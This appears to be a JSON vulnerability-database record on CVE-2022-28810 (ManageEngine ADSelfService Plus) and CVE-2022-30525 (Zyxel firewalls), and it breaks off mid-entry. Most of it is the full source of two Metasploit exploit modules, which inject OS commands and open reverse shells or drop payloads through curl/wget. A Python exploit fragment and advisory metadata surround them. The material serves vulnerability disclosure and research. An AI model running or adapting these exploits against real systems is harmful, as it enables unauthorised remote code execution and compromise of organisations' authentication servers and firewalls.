url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5\n )\n except (KeyboardInterrupt, requests.exceptions.Timeout):\n print(\"[!] Bye Bye hekcer !\")\n sys.exit(1)\n finally:\n\n try:\n print(\"[!] Can't exploit the target ! Code :\", response.status_code)\n\n except:\n print(\"[!] Enjoy your shell !!!\")\n\n\nif __name__ == \"__main__\":\n main()\n", "sourceHref": "https://0day.today/exploit/37766", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-06-09T15:44:23", "description": "A command injection vulnerability exists in Zoho ManageEngine ADSelfService Plus. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-09T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine ADSelfService Plus Command Injection (CVE-2022-28810)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28810"], "modified": "2022-06-09T00:00:00", "id": "CPAI-2022-0275", "href": "", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-23T19:29:59", "description": "A command injection vulnerability exists in Zyxel USG. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T00:00:00", "type": "checkpoint_advisories", "title": "Zyxel USG Command Injection (CVE-2022-30525)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-19T00:00:00", "id": "CPAI-2022-0251", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-06-24T08:36:18", "description": "This module exploits the \"custom script\" feature of ADSelfService Plus. The feature was removed in build 6122 as part of the patch for CVE-2022-28810. For purposes of this module, a \"custom script\" is arbitrary operating system command execution. This module uses an attacker provided \"admin\" account to insert the malicious payload into the custom script fields. When a user resets their password or unlocks their account, the payload in the custom script will be executed. The payload will be executed as SYSTEM if ADSelfService Plus is installed as a service, which we believe is the normal operational behavior. This is a passive module because user interaction is required to trigger the payload. This module also does not automatically remove the malicious code from the remote target. Use the \"TARGET_RESET\" operation to remove the malicious custom script when you are done. ADSelfService Plus uses default credentials of \"admin\":\"admin\"\n", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-19T17:33:54", "type": "metasploit", "title": "ManageEngine ADSelfService Plus Custom Script Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28810"], "modified": "2022-04-20T19:22:07", "id": "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2022_28810-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ADSelfService Plus Custom Script Execution',\n 'Description' => %q{\n This module exploits the \"custom script\" feature of ADSelfService Plus. The\n feature was removed in build 6122 as part of the patch for CVE-2022-28810.\n For purposes of this module, a \"custom script\" is arbitrary operating system\n command execution.\n\n This module uses an attacker provided \"admin\" account to insert the malicious\n payload into the custom script fields. When a user resets their password or\n unlocks their account, the payload in the custom script will be executed.\n The payload will be executed as SYSTEM if ADSelfService Plus is installed as\n a service, which we believe is the normal operational behavior.\n\n This is a passive module because user interaction is required to trigger the\n payload. This module also does not automatically remove the malicious code from\n the remote target. Use the \"TARGET_RESET\" operation to remove the malicious\n custom script when you are done.\n\n ADSelfService Plus uses default credentials of \"admin\":\"admin\"\n },\n 'Author' => [\n # Discovered and exploited by unknown threat actors\n 'Jake Baines', # Analysis, CVE credit, and Metasploit module\n 'Hernan Diaz', # Analysis and CVE credit\n 'Andrew Iwamaye', # Analysis and CVE credit\n 'Dan Kelley' # Analysis and CVE credit\n ],\n 'References' => [\n ['CVE', '2022-28810'],\n ['URL', 'https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html'],\n ['URL', 'https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/']\n ],\n 'DisclosureDate' => '2022-04-09',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Privileged' => true, # false if ADSelfService Plus is not run as a service\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/jjs_reverse_tcp'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8888,\n 'DisablePayloadHandler' => true,\n 'JJS_PATH' => '..\\\\jre\\\\bin\\\\jjs.exe'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/']),\n OptString.new('USERNAME', [true, 'The administrator username', 'admin']),\n OptString.new('PASSWORD', [true, 'The administrator user\\'s password', 'admin']),\n OptBool.new('TARGET_RESET', [true, 'On the target, disables custom scripts and clears custom script field', false])\n ])\n end\n\n ##\n # Because this is an authenticated vulnerability, we will rely on a version string\n # for the check function. We can extract the version (or build) from selfservice/index.html.\n ##\n def check\n res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/selfservice/index.html'))\n unless res\n return CheckCode::Unknown('The target failed to respond to check.')\n end\n\n unless res.code == 200\n return CheckCode::Safe('Failed to retrieve /selfservice/index.html')\n end\n\n ver = res.body[/\\.css\\?buildNo=(?<build_id>[0-9]+)/, :build_id]\n if ver.nil?\n return CheckCode::Safe('Could not extract a version number')\n end\n\n if Rex::Version.new(ver) < Rex::Version.new('6122')\n return CheckCode::Appears(\"This determination is based on the version string: #{ver}.\")\n end\n\n CheckCode::Safe(\"This determination is based on the version string: #{ver}.\")\n end\n\n ##\n # Authenticate with the remote target. Login requires four steps:\n #\n # 1. Grab a CSRF token\n # 2. Post credentials to /ServletAPI/accounts/login\n # 3. Post credentials to /j_security_check\n # 4. Grab another CSRF token for authenticated requests\n #\n # @return a new CSRF token to use with authenticated requests\n ##\n def authenticate\n # grab a CSRF token from the index\n res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do') })\n fail_with(Failure::Unreachable, 'The target did not respond') unless res\n fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['HttpOnly, adscsrf'].empty?\n csrf_tok = res.get_cookies_parsed['HttpOnly, adscsrf'].to_s[/HttpOnly, adscsrf=(?<token>[0-9a-f-]+); path=/, :token]\n fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok\n\n # send the first login request to get the ssp token\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ServletAPI/accounts/login'),\n 'keep_cookies' => true,\n 'vars_post' =>\n {\n 'loginName' => datastore['USERNAME'],\n 'domainName' => 'ADSelfService Plus Authentication',\n 'j_username' => datastore['USERNAME'],\n 'j_password' => datastore['PASSWORD'],\n 'AUTHRULE_NAME' => 'ADAuthenticator',\n 'adscsrf' => csrf_tok\n }\n })\n fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200\n\n # send the second login request to get the sso token\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/j_security_check'),\n 'keep_cookies' => true,\n 'vars_post' =>\n {\n 'loginName' => datastore['USERNAME'],\n 'domainName' => 'ADSelfService Plus Authentication',\n 'j_username' => datastore['USERNAME'],\n 'j_password' => datastore['PASSWORD'],\n 'AUTHRULE_NAME' => 'ADAuthenticator',\n 'adscsrf' => csrf_tok\n }\n })\n fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 302\n\n # revisit authorization.do to complete authentication\n res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do'), 'keep_cookies' => true })\n fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200\n fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['adscsrf'].empty?\n csrf_tok = res.get_cookies_parsed['adscsrf'].to_s[/adscsrf=(?<token>[0-9a-f-]+);/, :token]\n fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok\n\n print_good('Authentication successful')\n csrf_tok\n end\n\n ##\n # Triggering the payload requires user interaction. Using the default payload\n # handler will cause this module to exit after planting the payload, so the\n # module will spawn it's own handler so that it doesn't exit until a shell\n # has been received/handled. Note that this module is passive so it should\n # just be chilling quietly in the background.\n #\n # This code is largely copy/paste from windows/local/persistence.rb\n ##\n def create_multihandler(lhost, lport, payload_name)\n pay = framework.payloads.create(payload_name)\n pay.datastore['LHOST'] = lhost\n pay.datastore['LPORT'] = lport\n print_status('Starting exploit/multi/handler')\n\n # Set options for module\n mh = framework.exploits.create('multi/handler')\n mh.share_datastore(pay.datastore)\n mh.datastore['PAYLOAD'] = payload_name\n mh.datastore['EXITFUNC'] = 'thread'\n mh.datastore['ExitOnSession'] = true\n # Validate module options\n mh.options.validate(mh.datastore)\n # Execute showing output\n mh.exploit_simple(\n 'Payload' => mh.datastore['PAYLOAD'],\n 'LocalInput' => user_input,\n 'LocalOutput' => user_output,\n 'RunAsJob' => true\n )\n\n # Check to make sure that the handler is actually valid\n # If another process has the port open, then the handler will fail\n # but it takes a few seconds to do so. The module needs to give\n # the handler time to fail or the resulting connections from the\n # target could end up on on a different handler with the wrong payload\n # or dropped entirely.\n Rex.sleep(5)\n return nil if framework.jobs[mh.job_id.to_s].nil?\n\n return mh.job_id.to_s\n end\n\n # The json policy blob that ADSSP provides us is not accepted by ADSSP\n # if we try to POST it back. Specifically, ADSP is very unhappy about all\n # the booleans using \"true\" or \"false\" instead of \"1\" or \"0\" *except* for\n # HIDE_CAPTCHA_RPUA which has to remain a boolean. Sounds unbelievable, but\n # here we are.\n def fix_adssp_json(json_hash)\n json_hash.map do |key, value|\n if value.is_a? Hash\n [key, fix_adssp_json(value)]\n elsif value.is_a? Array\n value = value.map do |array_val|\n if array_val.is_a? Hash\n array_val = fix_adssp_json(array_val)\n end\n array_val\n end\n [key, value]\n elsif key == 'HIDE_CAPTCHA_RPUA'\n [key, value]\n elsif value.is_a? TrueClass\n [key, 1]\n elsif value.is_a? FalseClass\n [key, 0]\n else\n [key, value]\n end\n end.to_h\n end\n\n def exploit\n csrf_tok = authenticate\n\n # Grab the list of configured policies\n policy_list_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getPolicyConfigDetails')\n print_status(\"Requesting policy list from #{policy_list_uri}\")\n res = send_request_cgi({ 'method' => 'GET', 'uri' => policy_list_uri })\n fail_with(Failure::UnexpectedReply, 'Log in attempt failed') unless res.code == 200\n policy_json = res.get_json_document\n fail_with(Failure::UnexpectedReply, \"The target didn't return a JSON body\") if policy_json.nil?\n policy_details_json = policy_json['POLICY_DETAILS']\n fail_with(Failure::UnexpectedReply, \"The target didn't have any configured policies\") if policy_details_json.nil?\n\n # There can be multiple policies. This logic will loop over each one, grab the configuration\n # details, update the configuration to include our payload, and then POST it back.\n policy_details_json.each do |policy_entry|\n policy_id = policy_entry['POLICY_ID']\n policy_name = policy_entry['POLICY_NAME']\n fail_with(Failure::UnexpectedReply, 'Policy details missing name or id') if policy_id.nil? || policy_name.nil?\n\n print_status(\"Requesting policy details for #{policy_name}\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getAPCDetails'),\n 'vars_get' =>\n {\n 'POLICY_ID' => policy_id\n }\n })\n fail_with(Failure::UnexpectedReply, 'Acquiring specific policy details failed') unless res.code == 200\n\n # load the JSON and insert (or remove) our payload\n specific_policy_json = res.get_json_document\n fail_with(Failure::UnexpectedReply, \"The target didn't return a JSON body\") if specific_policy_json.nil?\n fail_with(Failure::UnexpectedReply, \"The target didn't contain the expected JSON\") if specific_policy_json['SCRIPT_COMMAND_RESET'].nil?\n new_payload = \"cmd.exe /c #{payload.encoded}\"\n\n if datastore['TARGET_RESET']\n print_status('Disabling custom script functionality')\n specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '0'\n specific_policy_json['SCRIPT_COMMAND_RESET'] = ''\n specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '0'\n specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = ''\n else\n print_status('Enabling custom scripts and inserting the payload')\n specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '1'\n specific_policy_json['SCRIPT_COMMAND_RESET'] = new_payload\n specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '1'\n specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = new_payload\n end\n\n # fix up the ADSSP provided json so ADSSP will accept it o.O\n updated_policy = fix_adssp_json(specific_policy_json).to_json\n\n policy_update_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/setAPCDetails')\n print_status(\"Posting updated policy configuration to #{policy_update_uri}\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => policy_update_uri,\n 'vars_post' =>\n {\n 'APC_SETTINGS_DETAILS' => updated_policy,\n 'POLICY_NAME' => policy_name,\n 'adscsrf' => csrf_tok\n }\n })\n fail_with(Failure::UnexpectedReply, 'Policy update request failed') unless res.code == 200\n\n # spawn our own payload handler?\n if !datastore['TARGET_RESET'] && datastore['DisablePayloadHandler']\n listener_job_id = create_multihandler(datastore['LHOST'], datastore['LPORT'], datastore['PAYLOAD'])\n if listener_job_id.blank?\n print_error(\"Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.\")\n end\n else\n print_good('Done!')\n end\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-24T08:36:15", "description": "This module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. Affected Zyxel models are: * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below * USG20-VPN and USG20W-VPN using firmware 5.21 and below * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T08:43:59", "type": "metasploit", "title": "Zyxel Firewall ZTP Unauthenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-13T20:32:12", "id": "MSF:EXPLOIT-LINUX-HTTP-ZYXEL_ZTP_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/zyxel_ztp_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection',\n 'Description' => %q{\n This module exploits CVE-2022-30525, an unauthenticated remote\n command injection vulnerability affecting Zyxel firewalls with zero\n touch provisioning (ZTP) support. By sending a malicious setWanPortSt\n command containing an mtu field with a crafted OS command to the\n /ztp/cgi-bin/handler page, an attacker can gain remote command execution\n as the nobody user.\n\n Affected Zyxel models are:\n\n * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below\n * USG20-VPN and USG20W-VPN using firmware 5.21 and below\n * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'jbaines-r7' # Vulnerability discovery and Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2022-30525' ],\n [ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/']\n ],\n 'DisclosureDate' => '2022-04-28',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_MIPS64,],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Shell Dropper',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_MIPS64],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'curl', 'wget' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n # Checks the build date that is embedded in the landing page. If it finds a build\n # date older than April 20, 2022 then it will additionally check if the model is\n # a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this\n # seems like a reasonable approach.\n def check\n res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/'))\n unless res\n return CheckCode::Unknown('The target failed to respond to check.')\n end\n\n unless res.code == 200\n return CheckCode::Safe('Failed to retrieve /')\n end\n\n ver = res.body[/favicon\\.ico\\?v=(?<build_date>[0-9]{6,})/, :build_date]\n if ver.nil?\n return CheckCode::Safe('Could not extract a version number')\n end\n\n if ver[0..5].to_i < 220420\n model = res.get_html_document.xpath('//title').text\n if model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN'))\n return CheckCode::Appears(\"This was determined by the model and build date: #{model}, #{ver}\")\n end\n end\n\n CheckCode::Safe(\"This determination is based on the build date string: #{ver}.\")\n end\n\n def execute_command(cmd, _opts = {})\n handler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler')\n print_status(\"Sending command to #{handler_uri}\")\n\n # this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too\n # but it's more involved.\n http_payload = {\n 'command' => 'setWanPortSt',\n 'proto' => 'dhcp',\n 'port' => Rex::Text.rand_text_numeric(4).to_s,\n 'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s,\n 'vlanid' => Rex::Text.rand_text_numeric(4).to_s,\n 'mtu' => \";#{cmd};\",\n 'data' => ''\n }\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => handler_uri,\n 'headers' =>\n {\n 'Content-Type' => 'application/json; charset=utf-8'\n },\n 'data' => http_payload.to_json\n })\n # Successful exploitation can result in no response (connection being held open by a reverse shell)\n # or, if the command executes immediately, a response with a 503.\n if res && res.code != 503\n fail_with(Failure::UnexpectedReply, \"The target replied with HTTP status #{res.code}. No reply was expected.\")\n end\n print_good('Command successfully executed.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/zyxel_ztp_rce.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2022-06-14T17:31:37", "description": "Windows Endpoint Configuration Manager Elevation of Privilege Vulnerability. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Microsoft Endpoint Configuration Manager Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24527"], "modified": "2022-06-14T07:00:00", "id": "MS:CVE-2022-24527", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24527", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2022-06-15T14:09:57", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mskb", "title": "Security update 2022-04-12", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24527"], "modified": "2022-04-12T08:00:00", "id": "KB12819689", "href": "https://support.microsoft.com/en-us/help/12819689", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-06-13T15:27:02", "description": "# CVE-2022-30525\nZyxel \u9632\u706b\u5899\u8fdc\u7a0b\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2022-30525\uff09\n\n\n# Optional ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T12:03:28", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-13T09:29:09", "id": "AD317F0A-2E09-54B8-A027-2E9FB07658F6", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-04T05:01:59", "description": "# Victorian Machinery\n\nVictorian Machinery is a proof of concept...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T10:31:19", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 